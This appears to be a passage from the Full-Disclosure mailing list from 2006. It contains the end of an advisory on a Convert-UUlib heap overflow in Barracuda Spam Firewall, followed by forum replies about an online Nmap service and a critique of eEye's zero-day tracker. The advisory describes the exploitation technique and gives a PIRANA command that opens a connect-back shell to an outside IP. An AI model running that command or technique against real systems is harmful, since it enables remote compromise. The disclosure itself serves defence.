virus from your organization by providing the following protection:

 * Anti-spam
 * Anti-virus
 * Anti-spoofing
 * Anti-phishing
 * Anti-spyware (Attachments)
 * Denial of Service


II. DESCRIPTION

In 2005, Mark Martinec and Robert Lewis found a flaw in the Convert-
UUlib library.  Few details were published regarding this flaw.

After some research, I found that the flaw was in the part of the code
where BinHex files were getting parsed.  By supplying an invalid size
for the resource fork or data fork in a BinHex's file header, it is
possible to create a heap overflow.

By taking advantage of the sequentials calls to free(), it's possible
to overwrite more than 4 bytes.  In fact, we can write a jmpcode in
memory that will jump to one of our registers containing the location
of our shellcode.  By using this technique, the exploit will be much
more reliable.  You will only need to supply a return location address
to the exploit code.

You do NOT need to have remote administration access (on port 8000)
for successfull exploitation.

For further informations about the details of the bugs, check the
exploit code.


III.IMPACT

Gain shell access to the remote Barracuda Spam Firewall.


IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com ,
it is possible to test the Barracuda Spam Firewall against the
Convert-UUlib vulnerability.

The version 0.3.1 of the PIRANA framework incorporates a new module to
exploit the Convert-UUlib library bug.  It contains three hardcoded
offsets that should reliably exploit every Barracuda Spam Firewall
with a firmware below 3.3.15.026 and virus definition below 2.0.325.

By calling PIRANA the way it is described below, you will get a TCP
connect back shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \
-l 1.2.3.4 -p 1234


V.  VERSIONS AFFECTED

This affects firmware releases before versions 3.3.15.026.  This is no
longer an issue with Barracuda's customers with current Energize
Updates, running virus definition 2.0.325, released Nov. 29, 2006.  It
is recommended that Barracuda's customers upgrade to the latest
generally available release.


VI. CREDITS

Mark Martinec and Robert Lewis found the original flaw in Convert-
UUlib.

Jean-Sébastien Guay-Leroux conducted further research on the bug and
produced an exploitation plugin for the PIRANA framework.


VII.REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349


VIII.   HISTORY

2005-04-26  : Bug is disclosed by Mark Martinec and Robert Lewis.
2006-08-??  : Convert-UUlib module exploit written for PIRANA.
2006-11-28  : Barracuda Networks is notified about the problem.
2006-11-28  : Barracuda Networks acknowledged the problem.
2006-11-29  : Barracuda Networks published a fix.
2006-12-05  : Advisory is disclosed to the public.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Nmap Online

[Richard A Nelson]

On Wed, 6 Dec 2006, Greg wrote:

 I don't wish to upset anyone but that answer has to be the craziest FIRST
 port of call approach I have seen used. I get plenty of those sorts of
 calls. I take about 30 seconds time on the phone for almost all of them. I
 say Pull the power plug out of the router. Wait 10 seconds, plug it back in
 and wait another 10 seconds. OK, try now and almost all of them report it
 works well.

That is heavily target market specific...  Whilst I offer the same line to some
friends and family, others I wouldn't dare start there (out of respect -
they've already done everything obvious before asking for help).

 Besides, wouldn't it be just as easy to use the Nmap sitting on my computer
 if I decided I needed to use it?

If only it was always that easy...  I just moved, and whilst the ISP is
the same, the CLEC is new - new lines, new IP, some newer softare, etc.

I need to verify *my* setup, so:
* my local nmap is useless
* my work boxen are heavily firewalled - even outbound
* my accounts elsewhere usually don't have nmap available
  to non-admins (and I shy from that role unless needed).

So...   For me, this has been an great service, and I'm sure I'm not
alone.

-- 
Rick Nelson
Life'll kill ya -- Warren Zevon
Then you'll be dead -- Life'll kill ya

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Nmap Online

[Ed Carp]

On 12/5/06, Greg [EMAIL PROTECTED] wrote:

 I don't wish to upset anyone but that answer has to be the craziest FIRST
 port of call approach I have seen used. I get plenty of those sorts of

Who said it was the first thing that was tried?  And you just can't
pull the plug on a router in a production shop.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] eEye's Zero-Day Tracker Launch

[chinese soup]

http://eeyeresearch.typepad.com/blog/
http://research.eeye.com/html/alerts/zeroday/index.html

If something is reported as a non-exploitable bug, we'll make sure to
exhaust the flaw for exploitability, as we have shown with the ASX Playlist
and the ADODB.Connection ActiveX zero-day vulnerabilities.

Or.. FUD?

1.) Adobe ActiveX
http://research.eeye.com/html/alerts/zeroday/20061128.html

Although there was no supplied proof of concept for these vulnerabilities,
releasing the method names as well as the fact that they are 'memory
corruption' errors and 'could be exploited by attackers to take complete
control of an affected system' without a vendor-supplied patch will put many
Adobe users at risk.

And..

Remote Code Execution:
Yes

Now wait a second, I thought that you guys were going to make sure to
exhaust the flaw for exploitability? Did you actually try this out that you
can say Remote Code Execution is possible?


2.) ASX Playlist
http://research.eeye.com/html/alerts/zeroday/20061122.html

Now this is fun.

Severity:
High

Remote Code Execution:
Yes

As a result, a two- or four-byte heap overflow is possible if the REF
HREF URL features a protocol shorter than three characters (the length of
mms).

Ok. But wait, what's this sentence doing here:
Exploitability due to the corruption of the adjacent heap block's header
has not yet been demonstrated but is assumed likely.

So... you ASSUMED that it is likely, even though you can only have up to a
4-byte overwrite which does not overwrite the needed pointers in order to
actually exploit this, yet you say Yes in Remote Code Execution?

trippin-out,
noodles for long life!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/